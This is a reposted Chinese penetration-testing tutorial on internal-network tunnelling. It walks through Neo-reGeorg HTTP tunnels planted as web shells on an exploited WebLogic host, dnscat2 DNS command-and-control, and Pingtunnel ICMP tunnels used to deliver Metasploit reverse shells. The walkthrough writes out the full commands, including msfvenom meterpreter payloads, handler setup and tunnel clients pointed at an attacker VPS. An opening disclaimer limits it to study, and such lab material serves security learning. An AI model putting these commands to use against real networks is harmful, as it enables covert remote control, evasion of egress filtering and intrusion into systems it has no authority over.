内网隧道—HTTP\DNS\ICMP

这篇具有很好参考价值的文章主要介绍了内网隧道—HTTP\DNS\ICMP。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

       本文仅限于安全研究和学习,用户承担因使用此工具而导致的所有法律和相关责任! 作者不承担任何法律和相关责任!

HTTP隧道

Neo-reGeorg

Neo-reGeorg 是一个旨在积极重构 reGeorg 的项目,目的是:

提高可用性,避免特征检测
提高 tunnel 连接安全性
提高传输内容保密性
应对更多的网络环境场景下使用

靶场环境:cve-2017-10271  weblogic

#靶场攻击过程,使用脚本工具得到shell,在此略过

1.设置密码生成 tunnel.(aspx|ashx|jsp|jspx|php) 并上传到WEB服务器

内网隧道—HTTP\DNS\ICMP,网络协议,网络

内网隧道—HTTP\DNS\ICMP,网络协议,网络

 2.使用蚁剑上传JSP文件

上传至此目录:可以访问到文件

/root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/

3.使用 neoreg.py 连接WEB服务器,在本地建立 socks 代理,代理默认端口 1080

修改配置文件:vim proxychains4.conf

内网隧道—HTTP\DNS\ICMP,网络协议,网络

 执行命令:

内网隧道—HTTP\DNS\ICMP,网络协议,网络内网隧道—HTTP\DNS\ICMP,网络协议,网络

 #测试代理: proxychains curl 127.0.0.1:7001

DNS隧道

Dnscat2

       dnscat2是一个DNS隧道工具,通过DNS协议创建加密的命令和控制通道,它的一大
特色就是服务端会有一个命令行控制台,所有的指令都可以在该控制台内完成。包
括:文件上传、下载、反弹Shell。
直连模式:客户端直接向指定IP的恶意DNS服务器发起DNS解析请求。

中继模式:像我们平时上网一样,DNS解析先经过互联网的迭代解析,最后指向我们
的恶意DNS服务器。相比直连,速度较慢,但是更安全。

服务端安装

apt install ruby ruby-dev git make g++ ruby-bundler
gem install bundler

内网隧道—HTTP\DNS\ICMP,网络协议,网络

内网隧道—HTTP\DNS\ICMP,网络协议,网络

git clone https://github.com/iagox86/dnscat2.git(也可以先下载文件,然后上传至VPS)
cd dnscat2/server
bundle install   #如此命令报错,和本地网络有关,多试几次

内网隧道—HTTP\DNS\ICMP,网络协议,网络

客户端编译

Linux:

git clone https://github.com/iagox86/dnscat2.git  
cd dnscat2/client/
make  

Windows:

下载Windows版本

在本地编译上传

上传已经编译好的 .exe程序

make编译之后会在此目录下生成一个dnscat可执行二进制文件。
Linux systemd-resolve占用53端口的解决方法: https://www.itren.org/319.html

Dnscat2直连模式

启动服务端

ruby ./dnscat2.rb

内网隧道—HTTP\DNS\ICMP,网络协议,网络

内网隧道—HTTP\DNS\ICMP,网络协议,网络

 启动客户端

内网隧道—HTTP\DNS\ICMP,网络协议,网络

 vps收到会话

内网隧道—HTTP\DNS\ICMP,网络协议,网络

help

windows

 进入session 1: session -i 1

shell    #获取主机shell

进入session 2 : session -i 2

内网隧道—HTTP\DNS\ICMP,网络协议,网络

 执行命令:

whoami

内网隧道—HTTP\DNS\ICMP,网络协议,网络

 直连模式流量特征:tcpdump udp dst port 53

Dnscat2中继模式

环境准备: 
1. 一台公网C&C服务器      
2. 一台内网靶机              #以win7为例
3. 一个可配置解析的域名

配置DNS域名解析:
创建A记录,将自己的域名解析服务器(ns.hack.com)指向云服务器(VPS IP)

A类解析是在告诉域名系统,ns.hacker.com的IP地址是 xxx.xxx.xxx.xxx

创建NS记录,将子域名 dns.hetian.cn 的DNS解析交给 ns.hack.com
NS解析是在告诉域名系统,想要知道 dns.hack.com 的IP地址,就去问ns.hacker.com 

内网隧道—HTTP\DNS\ICMP,网络协议,网络

 vps防火墙设置:开放全部UDP端口

内网隧道—HTTP\DNS\ICMP,网络协议,网络

启动服务端

ruby ./dnscat2.rb dns.xxx.xxx --secret=abcd

secret --指定密码

内网隧道—HTTP\DNS\ICMP,网络协议,网络

内网隧道—HTTP\DNS\ICMP,网络协议,网络

启动客户端

server #指定VPS地址

内网隧道—HTTP\DNS\ICMP,网络协议,网络

服务端收到session 3

内网隧道—HTTP\DNS\ICMP,网络协议,网络

获取shell

进入会话:session -i 4

内网隧道—HTTP\DNS\ICMP,网络协议,网络

执行命令: whoami

 内网隧道—HTTP\DNS\ICMP,网络协议,网络

ICMP隧道

Pingtunnel

ICMP隧道
      通过某种信道获取了内网主机的shell,但是当前信道不适合做远控的通信信道,
tcp 和 udp 等传输层协议不能出网, dns 、 http 等应用层协议也不能出网,只有
icmp 协议可以出网。

目的:上线仅icmp协议出网的内网主机

ICMP隧道转发TCP上线MSF

1.VPS启动ICMP隧道服务端

./pingtunnel -type server -noprint 1 -nolog 1

内网隧道—HTTP\DNS\ICMP,网络协议,网络

2.靶机启动ICMP隧道客户端

pingtunnel.exe -type client -l 127.0.0.1:9999 -s vpsip -t vpsip:7777 -tcp 1 -noprint 1 -nolog 1

内网隧道—HTTP\DNS\ICMP,网络协议,网络


3. MSF 生成反弹 shell 的 payload 上传到靶机

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=127.0.0.1 lport=9999 -f exe > hot.exe

内网隧道—HTTP\DNS\ICMP,网络协议,网络

 4.执行 payload 反弹 shell 到 MSF

设置侦听:

msfconsole

use exploit/multi/handler

set lhost xx.xx.xx.xx   (vps的内网IP)

set lport 8866

set payload windows/x64/meterpreter/reverse_tcp

exploit

内网隧道—HTTP\DNS\ICMP,网络协议,网络

5. 靶机执行payload,msf上线

内网隧道—HTTP\DNS\ICMP,网络协议,网络

内网隧道—HTTP\DNS\ICMP,网络协议,网络

 内网隧道—HTTP\DNS\ICMP,网络协议,网络

ICMP隧道转发Socks上线MSF

1. VPS启动ICMP隧道服务端

./pingtunnel -type server -noprint 1 -nolog 1

2.靶机启动ICMP隧道客户端

pingtunnel.exe -type client -l 127.0.0.1:9999 -s VPSIP -sock5 1 -noprint 1 -nolog 1

#  icmp隧道客户端监听127.0.0.1:9999启动socks5服务,
    通过连接到VPS IP的icmp隧道,
    由icmpserver转发socks5代理请求到目的地址 VPSIP:8899

3.MSF 生成反弹 shell 的 payload 上传到靶机,并执行

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=VPSIP lport=8866 HttpProxyType=SOCKS HttpProxyHost=127.0.0.1 HttpProxyPort=9999 -f exe > c2.exe

内网隧道—HTTP\DNS\ICMP,网络协议,网络

 5.设置侦听

handler -p windows/x64/meterpreter/reverse_tcp -H xx.xx.xx.xx -P8866

#IP是vps的内网IP

内网隧道—HTTP\DNS\ICMP,网络协议,网络

 6.MSF收到会话

内网隧道—HTTP\DNS\ICMP,网络协议,网络

 可以执行命令内网隧道—HTTP\DNS\ICMP,网络协议,网络

参考:

内网渗透之内网穿透 - 先知社区

...文章来源地址https://www.toymoban.com/news/detail-645891.html

到了这里,关于内网隧道—HTTP\DNS\ICMP的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 内网安全:隧道技术详解_第125天:内网安全-隧道技术&smb&icmp&正反向连接&防火墙出入规则上线

    目录 隧道技术 反向连接技术 反向连接实验所用网络拓扑图及说明 网络说明 防火墙限制说明 实验前提说明 实战一:CS反向连接上线 - 拿下Win2008 一. 使用转发代理上线创建监听器 二. 上传后门执行上线 隧道技术 - SMB协议 SMB协议介绍 实战二:SMB协议搭建隧道 正向连接 - 拿下

    2024年02月22日
    浏览(36)
  • 第125天:内网安全-隧道技术&SMB&ICMP&正反向连接&防火墙出入规则上线

    知识点 演示案例 总结

    2024年02月14日
    浏览(26)
  • DNS协议、ICMP协议、NAT技术

    目录 一、DNS协议 1.1 认识DNS 1.2 域名简介 1.3 域名解析过程 1.4 使用dig工具分析DNS过程 二、ICMP协议 2.1 ICMP协议的定位 2.2 ICMP功能 2.3 ICMP协议格式(了解) 2.4 ping命令 2.5 traceroute命令 三、NAT技术(重点) 3.1 NAT技术背景 3.2 NAT IP转换过程 3.3 NAPT 3.4 NAT的缺陷 3.5 NAT与代理服务器

    2024年02月05日
    浏览(24)
  • 详解MAC帧、ARP、DNS、ICMP协议

    比如新建了一个内网,如果一台机器A找机器B,封FRAME时(OSI的第二层用的数据格式),要封装对方的MAC, 开始时A不知道B的MAC,只知道IP,它就发一个ARP包 ,源IP是自己的,目的IP是B的,源MAC是自己的,目的MAC是广播的。然后这个请求包在内网内被广播,当其他机器接到这个

    2024年02月10日
    浏览(27)
  • 【Linux】DNS系统,ICMP协议,NAPT技术

    遏制自己内心的知识优越感,才能让你发自内心的去尊重他人,避免狂妄自大,才能让你不断的丰富自己的内心。 1. 域名其实就是平常我们所访问的www.baidu.com、www.google.com网址,有人说,我们访问服务器上的某个进程不应该用ip+port的方式来访问吗?怎么用域名开始访问了?

    2024年02月11日
    浏览(25)
  • 计算机网络实验4:HTTP、DNS协议分析

    实验内容 :使用Wireshark捕获数据包,根据捕获的相关数据包分别对HTTP、DNS协议展开分析。 额外内容 :利用fiddler软件对HTTPS协议进行分析。 所需学时 :1。 重难点 :HTTP和DNS协议的报文结构。 周次 :第3周。 教材相关章节 :2.4、2.7。 HTTP(超文本传输协议)是一个基于 请求与

    2024年02月13日
    浏览(42)
  • 内网安全-隧道技术&SSH实现通信&DNS上线与通信&CS上线Linux主机

    内网安全-隧道技术SSH实现通信DNS上线与通信CS上线Linux主机 一、DNS隧道技术 DNS简介:DNS协议为应用层协议,区域传输时用tcp协议,域名解析时用udp协议 ###通过DNS隧道绕过防火墙,实现CS上线 实验背景:靶机防火墙封禁出站TCP协议 1、判断出网协议,若果可以ping通,可以利用

    2024年02月02日
    浏览(45)
  • 【网络】DNS、ICMP、NAT

    目录 一、DNS(Domain Name System) 1、DNS背景 2、域名简介 二、ICMP协议 1、ICMP功能 2、ICMP的报文格式 3、ping命令 4、traceroute命令 三、NAT技术 1、NAT技术背景 2、NAT IP转换过程 3、NAPT 4、NAT技术的缺陷 5、NAT和代理服务器 DNS是一整套从域名映射到IP的系统  TCP/IP中使用IP地址和端口号来

    2024年02月14日
    浏览(21)
  • 【网络】DNS | ICMP | NAT | 代理服务器

    🐱作者:一只大喵咪1201 🐱专栏:《网络》 🔥格言: 你只管努力,剩下的交给时间! 前面几篇文章虽然讲介绍了整个网络通信的协议栈,我们也知道了完整的网络通信过程,但是还有几个坑没填,以及一些重要的协议和技术没有讲解。 DNS是一整套从域名映射到IP地址的系

    2024年02月11日
    浏览(33)
  • 【计网笔记06】计算机网络之应用层协议(SMTP协议、POP3协议、HTTP协议)、DNS域名系统、电子邮件系统

    这篇文章,主要介绍计算机网络之应用层协议(SMTP协议、POP3协议、HTTP协议)、DNS域名系统、电子邮件系统。 目录 一、计算机网络之应用层 1.1、应用层介绍 1.2、网络应用模型

    2024年02月08日
    浏览(40)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包